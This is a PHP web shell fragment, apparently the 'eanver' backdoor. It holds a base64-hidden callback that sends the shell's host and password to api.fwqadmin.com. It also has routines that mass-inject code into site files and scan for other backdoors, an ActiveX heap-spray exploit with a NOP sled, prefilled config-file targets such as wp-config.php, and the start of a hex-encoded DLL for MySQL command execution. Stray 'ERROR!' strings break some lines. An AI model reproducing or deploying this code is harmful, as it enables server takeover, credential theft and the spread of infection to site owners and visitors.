$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
$copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA');
$url=$copyurl.$serveru.'&passwd='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
$show = do_show($dir);
foreach($show as $files){
if(is_dir($files) && $bool){
do_passreturn($files,$code,$type,$bool,$filetype,$shell);
}else{
if($files == $shell) continue;
switch($type){
case "guama":
if(debug($files,$filetype)){
do_write($files,"ab","\n".$code) ? html_n("--> $files<br>") : html_n("--> $files<br>");
}
break;
case "qingma":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,'',$filecode);
do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>");
}
break;
case "tihuan":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,$filetype,$filecode);
do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>");
}
break;
case "scanfile":
$file = explode('/',$files);
if(stristr($file[count($file)-1],$code)){
html_a("?eanver=editr&p=$files",$files);
echo '<br>';
}
break;
case "scancode":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
html_a("?eanver=editr&p=$files",$files);
echo '<br>';
}
break;
case "scanphp":
$fileinfo = pathinfo($files);
if($fileinfo['extension'] == $code){
$filecode = @file_get_contents($files);
if(muma($filecode,$code)){
html_a("?eanver=editr&p=".urlencode($files),"");
html_a("?eanver=del&p=".urlencode($files),"");
echo $files.'<br>';
}
}
break;
}
}
}
}
class PHPzip{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = '';
var $gzfilename;
var $fp;
var $dirstr='';
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function startfile($path = "web.zip"){
$this->gzfilename=$path;
$mypathdir=array();
do{
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
do{
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,"w")){
return true;
}
return false;
}
function addfile($data, $name){
$name = str_replace('\\', '/', $name);
if(strrchr($name,'/')=='/') return $this->adddir($name);
$dtime = dechex($this->unix2DosTime());
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$datastr = "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $hexdtime;
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
$datastr .= pack('v', strlen($name));
$datastr .= pack('v', 0);
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $hexdtime;
$dirstr .= pack('V', $crc);
$dirstr .= pack('V', $c_len);
$dirstr .= pack('V', $unc_len);
$dirstr .= pack('v', strlen($name) );
$dirstr .= pack('v', 0 );
$dirstr .= pack('v', 0 );
$dirstr .= pack('v', 0 );
$dirstr .= pack('v', 0 );
$dirstr .= pack('V', 32 );
$dirstr .= pack('V',$this->datastr_len );
$dirstr .= $name;
$this->dirstr .= $dirstr;
$this -> file_count ++;
$this -> dirstr_len += strlen($dirstr);
$this -> datastr_len += $my_datastr_len;
}
function adddir($name){
$name = str_replace("\\", "/", $name);
ERROR!
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;
$this->dirstr .= $dirstr;
$this -> file_count ++;
$this -> dirstr_len += strlen($dirstr);
$this -> datastr_len += $my_datastr_len;
}
function createfile(){
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
pack('v', $this -> file_count) .
pack('v', $this -> file_count) .
pack('V', $this -> dirstr_len) .
pack('V', $this -> datastr_len) .
"\x00\x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
function start_unzip($tmp_name,$new_name,$todir='zipfile'){
$zip = new ZipArchive() ;
if ($zip->open($tmp_name) !== TRUE) {
echo '';
}
$zip->extractTo($todir);
$zip->close();
echo ' <a href="?eanver=main&path='.urlencode($todir).'"></a> <a href="javascript:history.go(-1);"></a>';
}
function muma($filecode,$filetype){
$dim = array(
"php" => array("eval(","exec("),
"asp" => array("WScript.Shell","execute(","createtextfile("),
"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
"jsp" => array("runtime.exec(")
);
foreach($dim[$filetype] as $code){
if(stristr($filecode,$code)) return true;
}
}
function debug($file,$ftype){
$type=explode('|',$ftype);
foreach($type as $i){
if(stristr($file,$i)) return true;
}
}
/*---string---*/
function str_path($path){
return str_replace('//','/',$path);
}
function msg($msg){
die("<script>window.alert('".$msg."');history.go(-1);</script>");
}
function uppath($nowpath){
$nowpath = str_replace('\\','/',dirname($nowpath));
return urlencode($nowpath);
}
function xxstr($key){
$temp = str_replace("\\\\","\\",$key);
$temp = str_replace("\\","\\\\",$temp);
return $temp;
}
/*---html---*/
function html_ta($url,$name){
html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
}
function html_a($url,$name,$where=''){
html_n("<a href=\"$url\" $where>$name</a> ");
}
function html_img($url){
html_n("<img src=\"?img=$url\" border=0>");
}
function back(){
html_n("<input type='button' value='' onclick='history.back();'>");
}
function html_radio($namei,$namet,$v1,$v2){
html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);
html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');
}
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
if($mode){
html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
}else{
html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
}
}
function html_base(){
html_n('function base64encode(str){
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var out, i, len;
var c1, c2, c3;
len = str.length;
i = 0;
out = "";
while (i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += "==";
break;
}
c2 = str.charCodeAt(i++);
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += "=";
break;
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
out += base64EncodeChars.charAt(c3 & 0x3F);
}
return out;
}
function utf16to8(str) {
var out, i, len, c;
out = "";
len = str.length;
for(i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
}
function utf8to16(str) {
var out, i, len, c;
var char2, char3;
out = "";
len = str.length;
i = 0;
while(i < len) {
c = str.charCodeAt(i++);
switch(c >> 4) {
case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
out += str.charAt(i-1);
break;
case 12: case 13:
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
break;
case 14:
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) |
((char2 & 0x3F) << 6) |
((char3 & 0x3F) << 0));
break;
}
}
return out;
}
');
}
function html_text($name,$cols,$rows,$value = ''){
html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
}
function html_select($array,$mode = '',$change = '',$name = 'class'){
html_n("<select name=$name $change>");
foreach($array as $name => $value){
if($name == $mode){
html_n("<option value=\"$name\" selected>$value</option>");
}else{
html_n("<option value=\"$name\">$value</option>");
}
}
html_n("</select>");
}
function html_font($color,$size,$name){
html_n("<font color=\"$color\" size=\"$size\">$name</font>");
}
function GetHtml($url)
{
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
if(function_exists('fsockopen')){
$link = parse_url($url);
$query=$link['path'].'?'.$link['query'];
$host=strtolower($link['host']);
$port=$link['port'];
if($port==""){$port=80;}
$fp = fsockopen ($host,$port, $errno, $errstr, 10);
if ($fp)
{
$out = "GET /{$query} HTTP/1.0\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$inheader=1;
while(!feof($fp))
{$line=fgets($fp,4096);
if($inheader==0){$contents.=$line;}
if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
}
fclose ($fp);
$c= $contents;
}
}
if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if(empty($c) && ini_get('allow_url_fopen')){
$c = file_get_contents($url);
}
if(empty($c)){
echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
}
if(!empty($c))
{
return $c;
}
}
function html_main($path,$shellname){
$serverip=gethostbyname($_SERVER['SERVER_NAME']);
print<<<END
<html><title>{$shellname}</title>
<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value=''> <input type='submit' value='' onclick='main.location.reload()'></td></tr></form></table>
END;
html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");
html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");
html_n("</iframe></td></tr></table></html>");
}
function islogin($shellname,$myurl){
print<<<END
<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'><input name='postpass' type='password' size='22'> <input type='submit' value=''><br><br><br><font color=#3399FF></font><br></div></center>
END;
}
function html_sql(){
html_input("text","sqlhost","localhost","<br>MYSQL","30");
html_input("text","sqlport","3306","<br>MYSQL","30");
html_input("text","sqluser","root","<br>MYSQL","30");
html_input("password","sqlpass","","<br>MYSQL","30");
html_input("text","sqldb","dbname","<br>MYSQL","30");
html_input("submit","sqllogin","","<br>");
html_n('</form>');
}
function Mysql_Len($data,$len)
{
if(strlen($data) < $len) return $data;
return substr_replace($data,'...',$len);
}
function html_n($data){
echo "$data\n";
}
/*---css---*/
function css_img($img){
$images = array(
"exe"=>
"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
"xhIAOw==",
"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"txt"=>
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
"UpPWG3Ig6Hq/XmRjuZwkAAA7",
"html"=>
"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
"ADs=",
"js"=>
"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
"a00AjYYBbc/o9HjNniUAADs=",
"xml"=>
"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
"IQA7",
"mp3"=>
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
"img"=>
"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
"FxEAOw==",
"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
"/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
"OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
"aNOmRcjVj02tPxPCzfkvIAA7"
);
header('Content-type: image/gif');
echo base64_decode($images[$img]);
die();
}
function css_showimg($file){
$it=substr($file,-3);
switch($it){
case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
case "htm": case "tml": return 'html';break;
case "exe": case "com": return 'exe';break;
case "xml": case "doc": return 'xml';break;
case ".js": case "vbs": return 'js';break;
case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
default: return 'txt';break;
}
}
function css_js($num,$code = ''){
if($num == "shellcode"){
return '<%@ LANGUAGE="JavaScript" %>
<%
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
var shellcode = unescape("'.$code.'");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = "";
while (buffer.length < 1319) buffer+="A";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
act.hgs_startNotify(buffer);
%>';
}
html_n('<script language="javascript">');
if($num == "1"){
html_n(' function rusurechk(msg,url){
smsg = "FileName:[" + msg + "]\nPlease Input New File:";
re = prompt(smsg,msg);
if (re){
url = url + re;
window.location = url;
}
}
function rusuredel(msg,url){
smsg = "Do You Suer Delete [" + msg + "] ?";
if(confirm(smsg)){
URL = url + msg;
window.location = url;
}
}
function Delok(msg,gourl)
{
smsg = "[" + unescape(msg) + "]?";
if(confirm(smsg))
{
if(gourl == \'b\')
{
document.getElementById(\'actall\').value = escape(gourl);
document.getElementById(\'fileall\').submit();
}
else window.location = gourl;
}
}
function CheckAll(form)
{
for(var i=0;i<form.elements.length;i++)
{
var e = form.elements[i];
if (e.name != \'chkall\')
e.checked = form.chkall.checked;
}
}
function CheckDate(msg,gourl)
{
smsg = ":[" + msg + "]";
re = prompt(smsg,msg);
if(re)
{
var url = gourl + re;
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
var r = re.match(reg);
if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;}
else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
}
}
function SubmitUrl(msg,txt,actid)
{
re = prompt(msg,unescape(txt));
if(re)
{
document.getElementById(\'actall\').value = actid;
document.getElementById(\'inver\').value = escapERROR!
e(re);
document.getElementById(\'fileall\').submit();
}
}');
}elseif($num == "2"){
html_n('var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
var txt, i, found;
if(str == "")return false;
if(NS4){
if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
if(n == 0) alert(str + " ... Not-Find")
}
if(IE4){
txt = win.document.body.createTextRange();
for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
txt.moveStart("character", 1);
txt.moveEnd("textedit")
}
if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
}
return false
}
function CheckDate(){
var re = document.getElementById(\'mtime\').value;
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
var r = re.match(reg);
var t = document.getElementById(\'charset\').value;
t = t.toLowerCase();
if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;}
else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value);
if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}
');
if (substr(PHP_VERSION,0,1)>=5){html_n('if(t=="gbk" || t=="gb2312"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}');}
html_n('
document.getElementById(\'editor\').submit();}
}');
}elseif($num == "3"){
html_n('function Full(i){
if(i==0 || i==5){
return false;
}
Str = new Array(12);
Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
Str[4] = "Provider=MSDAORA.1;Password=;User ID=;Data Source=;Persist Security Info=True;";
Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
Str[8] = "DELETE FROM [TableName] WHERE ID=100";
Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
Str[11] = "DROP TABLE [TableName]";
Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
if(i<=4){
DbForm.string.value = Str[i];
}else{
DbForm.sql.value = Str[i];
}
return true;
}');
}
elseif($num == "4"){
html_n('function Fulll(i){
if(i==0){
return false;
}
Str = new Array(8);
Str[1] = "config.inc.php";
Str[2] = "config.inc.php";
Str[3] = "config_base.php";
Str[4] = "config.inc.php";
Str[5] = "config.php";
Str[6] = "wp-config.php";
Str[7] = "config.php";
Str[8] = "mysql.php";
sform.code.value = Str[i];
return true;
}');
}
html_n('</script>');
}
function css_left(){
html_n('<style type="text/css">
.menu{width:152px;margin-left:auto;margin-right:auto;}
.menu dl{margin-top:2px;}
.menu dl dt{top left repeat-x;}
.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
.menu dl dt a:hover{color:#FFFFCC;}
.menu dl dd ul{list-style:none;}
.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
border-style:solid;border-width:1px;}
.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
</STYLE>');
html_n('<script language="javascript">
function getObject(objectId){
if(document.getElERROR!
ementById && document.getElementById(objectId)) {
return document.getElementById(objectId);
}
else if (document.all && document.all(objectId)) {
return document.all(objectId);
}
else if (document.layers && document.layers[objectId]) {
return document.layers[objectId];
}
else {
return false;
}
}
function showHide(objname){
var obj = getObject(objname);
if(obj.style.display == "none"){
obj.style.display = "block";
}else{
obj.style.display = "none";
}
}
</script><div class="menu">');
}
function css_main(){
html_n('<style type="text/css">
*{padding:0px;margin:0px;}
body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<table width="85%" border=0 bgcolor="#555555" align="center">');
}
function css_foot(){
html_n('</td></tr></table>');
}
function Mysql_shellcode()
{
return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000